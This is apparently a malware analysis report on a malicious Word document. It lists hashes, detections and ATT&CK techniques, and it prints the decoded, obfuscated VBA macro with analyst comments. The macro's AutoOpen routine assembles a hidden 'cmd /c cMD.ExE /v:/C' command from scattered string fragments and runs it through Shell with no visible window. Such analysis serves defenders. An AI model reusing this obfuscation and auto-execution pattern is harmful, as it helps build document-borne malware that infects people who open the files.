Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 21c7068e1b87c798…

MALICIOUS

Office (OLE)

Size: 169.6 KB · Created: 2018-07-26 22:56:00 · Authoring application: Microsoft Office Word · First seen: 2019-03-10
MD5: 805d985990b25dbf8acc395119ab5992 SHA-1: 1695ebf9bc211250fcb6db5b4fd07cf3da232f52 SHA-256: 21c7068e1b87c7983f2f6bf489e2e054bd1131b12bb16ca144a8a7e612bedfed
Risk score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, which is a common technique for initial execution. The macro attempts to construct a command string and execute it using the Shell function, likely to download and run a second-stage payload. The ClamAV detection further confirms its malicious nature.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-6821631-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6821631-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30533 bytes
SHA-256: 30f286f4de2dad19edd276f1233a9e2f3cc214dd91115c6e7b96b72dbb6bd376
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wFpcccFKjw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
' Analyst note: auto-executing entry point (Word runs it when the document is
' opened). Most statements below are junk: arithmetic and conversions on
' variables that are never assigned anywhere in the visible macro. They only
' exist to pad the code and defeat simple signatures.
' On Error Resume Next swallows any runtime error those junk lines raise, so
' execution always reaches the Shell call at the end.
On Error Resume Next
   YtOmM = Oct(lZmjaj + 38212)
   jCFHE = AztdYm
   XFEkF = tMwGwP
   vdpOGH = Cos(zEEad)
   FdzPY = CDbl(114)
   PaRrYD = NOuiW
' The command string is built by concatenating the return values of many
' helper functions (CzKzrhLHn, TPzIEWpztLj, jOkijirZLHl and McwqV are the
' ones visible in this preview; the other names are presumably further
' helpers in the truncated part of the module) around the literal "cm".
' Each helper contributes a fragment of text, so no single function holds a
' recognisable command line on its own.
XamlKvnSw = "" + BbrqXfTL + QZMaMTsho + CVar("cm") + JCoTKQZhUXwUi + uEotZCuwjLMMUH + CzKzrhLHn + TPzIEWpztLj + jOkijirZLHl + McwqV + LuRfsuktVu + wahhHnpqrC + NKOUj + kzJmTp + vwctTHQdldz + qWLVOfjB + PEJadlmYB + kcJUTI + ziVaOQjw + Ijpurvc + rwdlBMbcYWs + BrbiZ + vjNnFJwa + zTpMuild + AJPanljLiEC + RSTriTGDMwH + EsIajz + dGpcwPoN + prnmpNbwLI + FQaitMMTWu + PiYJIEC + YathLoJZP + nkcuzds + fiNzHw + HBSVucQ + jOYTiTGfI + pWfEhpA + hfSKpN + ZKWudNIPd + iYApQ + ZqZNw + BHpWLT + WQoahQozdjY + QlYriaifYXDMFi + iEsUzcc
   SQzQr = Oct(uCOpz - ZrLwoI)
   OPKpDt = Cos(oLNMq)
' Hands the assembled string to Shell. The second argument, 0 (vbHide), runs
' the process with no visible window. This is the line the OLE_VBA_AUTOOPEN /
' T1059.005 findings in the report refer to.
Shell@ XamlKvnSw, 0
   LTpUi = CLng(XuVCOB / aEzLlQ / 2426 - AVpMT)
End Sub


Attribute VB_Name = "OYDllmHzIvM"
Function CzKzrhLHn()
' Analyst note: returns one fragment of the command line that AutoOpen
' concatenates. Only the string assignments matter; the numeric assignments
' and the Hex/Sgn/Atn/CLng/Tan calls on unassigned variables are inert
' padding whose errors are suppressed by On Error Resume Next.
On Error Resume Next
' Visible text, once the runs of spaces are ignored: "d ... /c ... c". Joined
' after the literal "cm" from AutoOpen this presumably spells "cmd /c c...".
mTcHumvQHc = "d        " + "       " + "/c        " + "       c"
zWpfI = RfGddi
   AaKbrd = Hex(211325035)
' Continues with "MD.ExE /v:/C" followed by a single computed character and
' "Set". Every summand inside Chr() except 34 is never assigned in the
' visible code, so this likely evaluates to Chr(34), a double quote — confirm
' by emulation rather than relying on this note.
iJGciRGPO = "MD.ExE  " + "/v:/" + "C  " + CStr(Chr(pKhQAJzMwo + iTndijL + 34 + BDCPqCjGBpMJ + mzHwrowraCMSvp)) + "  Set"
TNPzk = 10
   QADmaj = Sgn(PNIKw + dDoJA)
   fSkTvw = Atn(VRsBj * LNcbK - QZvNj - YmoQZ)
' The remaining pieces are filler made of slash, backslash, dash and
' underscore characters with a few other symbols mixed in; they are split
' into short literals so no signature-sized substring is constant.
PVrwE = "   }`$,=-\" + "/\__-/" + "/-" + "/-\__ -" + "\\_-/" + "-\_-_///_ "
jaTSmTa = "_/_/"
iPzPk = CLng(iifwVG)
   CPaNwp = 976
XjwKwBALrJs = "-\\_" + "\/\-" + "-/- -_/" + "\-\_\_-_" + "\/-/ \-_/" + "--\/_\-\" + "//_ /_-_"
FBzWJR = 3930
tCiQERCZm = "-_\/\_\-\" + "// \" + "\\-" + "/\_"
qoqOrH = "-_-/-/_/ " + "__/" + "-\_//\" + "/_\-\- " + "/"
' Return value: the pieces above in order.
CzKzrhLHn = mTcHumvQHc + iJGciRGPO + PVrwE + jaTSmTa + XjwKwBALrJs + tCiQERCZm + qoqOrH
   EfSwQM = Tan(Tjmtws / qdkYpM)
End Function
Function TPzIEWpztLj()
' Analyst note: another fragment-producing helper for the command string
' assembled in AutoOpen. Same pattern as CzKzrhLHn: junk numeric statements
' (Rnd, ChrB, Fix, Atn, CInt on unassigned variables) interleaved with short
' string literals; errors from the junk are suppressed by On Error Resume
' Next. Only the seven string variables feed the return value.
On Error Resume Next
LirNkV = Rnd(7)
   aGiBz = 69
ZjoJvwszzL = "/_\-/_--"
MUcSlc = "_/\\" + "-\ "
NWfJfd = ChrB(76432 * ZJsZs - 29193 / iwwHRY)
   zKZTp = 123258800
tatOTINFMqF = "/-\\-"
AiZcqc = ChrB(93884 - hriob)
   ULbEDB = Fix(oaOQh - FKzEzQ + 83930 * TmoBBs)
ahLBa = "_-_"
KiVOFH = EWrfq
   avzwX = 1
   pLlBBY = CCJvNf
qfilYjOnizT = "\_/\-" + "/" + "/ -/_"
Pjikjr = "\-/\__-\" + "-//\ _\\" + "_/\_--" + "_///-\ \/" + "/\_"
lzCkz = ZLETZO
GzOCkaaiAr = "\_--" + "\-/-/_ _\\" + "\//-_" + "/" + "/-_--\ /-_" + "\/-_/__\\-" + "/- -/"
' Return value: the filler fragments concatenated in declaration order.
TPzIEWpztLj = ZjoJvwszzL + MUcSlc + tatOTINFMqF + ahLBa + qfilYjOnizT + Pjikjr + GzOCkaaiAr
   zYvwPs = Atn(4)
   cTJoiM = UJaNlZ
   ChUUTj = CInt(EjaBU)
End Function
Function jOkijirZLHl()
' Analyst note: third visible fragment helper for the AutoOpen command
' string. Structure matches the others: On Error Resume Next, junk numeric
' statements on unassigned variables, and split string literals joined into
' the return value. Unlike the previous helpers, some of these literals mix
' letters and braces ("h", "c", "t", "a", "{", "}") into the slash/dash
' filler; what role those characters play after the fragments are combined
' is not established by the visible code and should be confirmed by
' emulating the macro.
On Error Resume Next
rbcAQ = Tan(5)
   ScYuTJ = 2570
fXqhLzU = "\_\_\/" + "-_/-\-" + "/ _--"
uhYtHh = 9
KjdMDSSnsd = "/" + "\/" + "\/_\_--/_" + " \--_\" + "/--/_\" + "\_/_}/" + "/\-_/"
AEAaKiVNzqT = "-_\_/-_-\}"
jBFVS = Round(wIZVGo)
TjAPUMvZwN = "_-\/\\/-_\" + "_/-" + "/_{\-\" + "//-_-" + "/__" + "\/" + "\-h/\-"
YHULIR = Int(621)
   dFuwUj = 9754
SwXiPibpcK = "\_" + "___-/\\//-"
jfsqE = Cos(DqjYQ)
   IWjHr = 2385
CZMqJRA = "c-/_" + "\_" + "_/-/\-_/\-" + "t"
sOhjAb = "/\_" + "-\\\__/-/" + "_-/a/_/" + "_" + "/\_"
CpCRaI = "_\---\\-"
' Return value: the eight fragments concatenated in declaration order.
jOkijirZLHl = fXqhLzU + KjdMDSSnsd + AEAaKiVNzqT + TjAPUMvZwN + SwXiPibpcK + CZMqJRA + sOhjAb + CpCRaI
   fhRrlT = Ooosu
   vrACh = wjoqz
End Function
Function McwqV()
On Error Resume Next
fjBZwF = 8043
VMHDuH = "c/-_--_\_"
FJXZCr = sTcXI
fUizaOVYIG = "/_\" + "\//\}-_"
vwMwlA = djVQCW
   mjSCi = Int(85757698)
   jPzGDH = bKTBE
miGFXf = "/-" + "_///\" + "-_" + "\\\_;_\-_/"
HdYfOz = "-__" + "\-//"
EGjuCn = CBool(24)
   Gcbzi = Rnd(FBnNU)
ficunVMBkUz = "-\/k/" + "__-\\--\/" + "\-_/_a" + "--/\/\_-_" + "_/\"
iqLJYf = kbOkIT
   BSiDbM = Rnd(49375 / 13961)
   RHjzi = 50289889
KNZZzojiK = "\-_e-\_\/" + "/_\/_-_" + "/-\r\_"
Pluld = ChrB(8)
   wLTQk = 70
EavzWp = "\/-_///"
McwqV = VMHDuH + fUizaOVYIG + miGFXf + HdYfOz + ficunVMBkUz 
... (truncated)